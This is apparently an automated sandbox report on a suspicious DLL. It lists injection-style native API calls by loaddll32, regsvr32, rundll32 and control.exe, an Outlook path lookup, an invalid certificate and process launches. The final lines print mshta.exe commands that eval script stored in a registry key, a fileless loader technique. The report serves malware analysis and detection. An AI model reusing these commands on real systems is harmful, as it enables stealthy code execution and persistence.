Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01031635 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 0_2_01031635
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0103963A GetProcAddress,NtCreateSection,memset, 0_2_0103963A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01023EB7 NtMapViewOfSection, 0_2_01023EB7
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0102D049 NtGetContextThread,RtlNtStatusToDosError, 0_2_0102D049
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0103C0B8 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 0_2_0103C0B8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0102C0CF memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 0_2_0102C0CF
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0102B8F7 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 0_2_0102B8F7
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01042CA5 memset,NtQueryInformationProcess, 0_2_01042CA5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0103CFE8 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 0_2_0103CFE8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01027E6C NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 0_2_01027E6C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01029690 NtQuerySystemInformation,RtlNtStatusToDosError, 0_2_01029690
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A08B7 NtAllocateVirtualMemory, 0_2_013A08B7
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A0880 NtAllocateVirtualMemory, 0_2_013A0880
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A0ABA NtProtectVirtualMemory, 0_2_013A0ABA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_049D6C06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 3_2_049D6C06
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_049D65B4 NtMapViewOfSection, 3_2_049D65B4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_049D7562 GetProcAddress,NtCreateSection,memset, 3_2_049D7562
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_049DB2A9 NtQueryVirtualMemory, 3_2_049DB2A9
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_030E0880 NtAllocateVirtualMemory, 3_2_030E0880
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_030E0ABA NtProtectVirtualMemory, 3_2_030E0ABA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_030E08B7 NtAllocateVirtualMemory, 3_2_030E08B7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053DC51B memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 3_2_053DC51B
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053CD551 memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset, 3_2_053CD551
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053C4D95 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 3_2_053C4D95
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053E4582 NtQueryInformationProcess, 3_2_053E4582
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053E4FEA NtWriteVirtualMemory,VirtualProtectEx,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 3_2_053E4FEA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053E67CD GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 3_2_053E67CD
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053D963A GetProcAddress,NtCreateSection,memset, 3_2_053D963A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053D1635 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 3_2_053D1635
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053C3EB7 NtMapViewOfSection, 3_2_053C3EB7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053DD9F4 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 3_2_053DD9F4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053D09CA NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 3_2_053D09CA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053CB0A5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 3_2_053CB0A5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053E2CA5 memset,NtQueryInformationProcess, 3_2_053E2CA5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053DCFE8 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 3_2_053DCFE8
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053C7E6C NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 3_2_053C7E6C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053C9690 NtQuerySystemInformation,RtlNtStatusToDosError, 3_2_053C9690
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053CD049 NtGetContextThread,RtlNtStatusToDosError, 3_2_053CD049
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053DC0B8 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 3_2_053DC0B8
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053CB8F7 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 3_2_053CB8F7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053CC0CF memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 3_2_053CC0CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_006D0ABA NtProtectVirtualMemory, 4_2_006D0ABA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_006D08B7 NtAllocateVirtualMemory, 4_2_006D08B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_006D0880 NtAllocateVirtualMemory, 4_2_006D0880
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AC4582 NtQueryInformationProcess, 4_2_04AC4582
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AA4D95 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 4_2_04AA4D95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04ABC51B memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 4_2_04ABC51B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AB1635 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 4_2_04AB1635
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AC67CD GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 4_2_04AC67CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AAB0A5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 4_2_04AAB0A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04ABD9F4 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 4_2_04ABD9F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AC2CA5 memset,NtQueryInformationProcess, 4_2_04AC2CA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AA9690 NtQuerySystemInformation,RtlNtStatusToDosError, 4_2_04AA9690
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AA7E6C NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 4_2_04AA7E6C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04ABCFE8 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 4_2_04ABCFE8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AC4FEA NtWriteVirtualMemory,VirtualProtectEx,RtlNtStatusToDosError,SetLastError, 4_2_04AC4FEA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04ABC0B8 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 4_2_04ABC0B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AAB8F7 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 4_2_04AAB8F7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AAC0CF memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 4_2_04AAC0CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AAD049 NtGetContextThread,RtlNtStatusToDosError, 4_2_04AAD049
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AB09CA NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 4_2_04AB09CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_02B96C06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 5_2_02B96C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_02B965B4 NtMapViewOfSection, 5_2_02B965B4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_02B97562 GetProcAddress,NtCreateSection,memset, 5_2_02B97562
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_02B9B2A9 NtQueryVirtualMemory, 5_2_02B9B2A9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_02BF0ABA NtProtectVirtualMemory, 5_2_02BF0ABA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_02BF08B7 NtAllocateVirtualMemory, 5_2_02BF08B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_02BF0880 NtAllocateVirtualMemory, 5_2_02BF0880
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C44582 NtQueryInformationProcess, 5_2_04C44582
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C24D95 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 5_2_04C24D95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C2D551 memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset, 5_2_04C2D551
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C3C51B memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 5_2_04C3C51B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C23EB7 NtMapViewOfSection, 5_2_04C23EB7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C31635 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 5_2_04C31635
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C3963A GetProcAddress,NtCreateSection,memset, 5_2_04C3963A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C467CD GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 5_2_04C467CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C44FEA NtWriteVirtualMemory,VirtualProtectEx,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 5_2_04C44FEA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C2B0A5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 5_2_04C2B0A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C309CA NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 5_2_04C309CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C3D9F4 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 5_2_04C3D9F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C42CA5 memset,NtQueryInformationProcess, 5_2_04C42CA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C29690 NtQuerySystemInformation,RtlNtStatusToDosError, 5_2_04C29690
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C27E6C NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 5_2_04C27E6C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C3CFE8 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 5_2_04C3CFE8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C2C0CF memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 5_2_04C2C0CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C2B8F7 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 5_2_04C2B8F7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C3C0B8 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 5_2_04C3C0B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C2D049 NtGetContextThread,RtlNtStatusToDosError, 5_2_04C2D049
Source: C:\Windows\System32\control.exe Code function: 42_2_00E2F83C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose, 42_2_00E2F83C
Source: C:\Windows\System32\control.exe Code function: 42_2_00E1617C NtAllocateVirtualMemory, 42_2_00E1617C
Source: C:\Windows\System32\control.exe Code function: 42_2_00E22B88 NtWriteVirtualMemory, 42_2_00E22B88
Source: C:\Windows\System32\control.exe Code function: 42_2_00E334E4 NtQueryInformationProcess, 42_2_00E334E4
Source: C:\Windows\System32\control.exe Code function: 42_2_00E32CC4 NtMapViewOfSection, 42_2_00E32CC4
Source: C:\Windows\System32\control.exe Code function: 42_2_00E1EC38 NtReadVirtualMemory, 42_2_00E1EC38
Source: C:\Windows\System32\control.exe Code function: 42_2_00E1EDFC NtQueryInformationToken,NtQueryInformationToken,NtClose, 42_2_00E1EDFC
Source: C:\Windows\System32\control.exe Code function: 42_2_00E3B524 RtlAllocateHeap,NtQueryInformationProcess,RtlDeleteBoundaryDescriptor, 42_2_00E3B524
Source: C:\Windows\System32\control.exe Code function: 42_2_00E2CF2C NtCreateSection, 42_2_00E2CF2C
Source: C:\Windows\System32\control.exe Code function: 42_2_00E55027 NtProtectVirtualMemory,NtProtectVirtualMemory, 42_2_00E55027
Source: C:\Windows\System32\control.exe Code function: 43_2_00E1F83C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose, 43_2_00E1F83C
Source: C:\Windows\System32\control.exe Code function: 43_2_00E0617C NtAllocateVirtualMemory, 43_2_00E0617C
Source: C:\Windows\System32\control.exe Code function: 43_2_00E12B88 NtWriteVirtualMemory, 43_2_00E12B88
Source: C:\Windows\System32\control.exe Code function: 43_2_00E234E4 NtQueryInformationProcess, 43_2_00E234E4
Source: C:\Windows\System32\control.exe Code function: 43_2_00E22CC4 NtMapViewOfSection, 43_2_00E22CC4
Source: C:\Windows\System32\control.exe Code function: 43_2_00E0EC38 NtReadVirtualMemory, 43_2_00E0EC38
Source: C:\Windows\System32\control.exe Code function: 43_2_00E0EDFC NtQueryInformationToken,NtQueryInformationToken,NtClose, 43_2_00E0EDFC
Source: C:\Windows\System32\control.exe Code function: 43_2_00E2B524 RtlAllocateHeap,NtQueryInformationProcess,RtlDeleteBoundaryDescriptor, 43_2_00E2B524
Source: C:\Windows\System32\control.exe Code function: 43_2_00E1CF2C NtCreateSection, 43_2_00E1CF2C
Source: C:\Windows\System32\control.exe Code function: 43_2_00E45003 NtProtectVirtualMemory,NtProtectVirtualMemory, 43_2_00E45003
Source: C:\Windows\System32\control.exe Code function: 45_2_0083F83C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose, 45_2_0083F83C
Source: C:\Windows\System32\control.exe Code function: 45_2_0082617C NtAllocateVirtualMemory, 45_2_0082617C
Source: C:\Windows\System32\control.exe Code function: 45_2_00832B88 NtWriteVirtualMemory, 45_2_00832B88
Source: C:\Windows\System32\control.exe Code function: 45_2_00842CC4 NtMapViewOfSection, 45_2_00842CC4
Source: C:\Windows\System32\control.exe Code function: 45_2_008434E4 NtQueryInformationProcess, 45_2_008434E4
Source: C:\Windows\System32\control.exe Code function: 45_2_0082EC38 NtReadVirtualMemory, 45_2_0082EC38
Source: C:\Windows\System32\control.exe Code function: 45_2_0082EDFC NtQueryInformationToken,NtQueryInformationToken,NtClose, 45_2_0082EDFC
Source: C:\Windows\System32\control.exe Code function: 45_2_0084B524 RtlAllocateHeap,NtQueryInformationProcess,RtlDeleteBoundaryDescriptor, 45_2_0084B524
Source: C:\Windows\System32\control.exe Code function: 45_2_0083CF2C NtCreateSection, 45_2_0083CF2C
Source: C:\Windows\System32\control.exe Code function: 45_2_00865003 NtProtectVirtualMemory,NtProtectVirtualMemory, 45_2_00865003
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
PE file contains strange resources
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll Jump to behavior
PE / OLE file has an invalid certificate
Source: 61b85f75e6a7c.dll Static PE information: invalid certificate
Source: 61b85f75e6a7c.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll"
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll",#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\61b85f75e6a7c.dll
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll",#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\61b85f75e6a7c.dll,DllRegisterServer
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Gxum='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Gxum).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Aw2g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Aw2g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Acrf='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Acrf).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Sou4='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Sou4).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
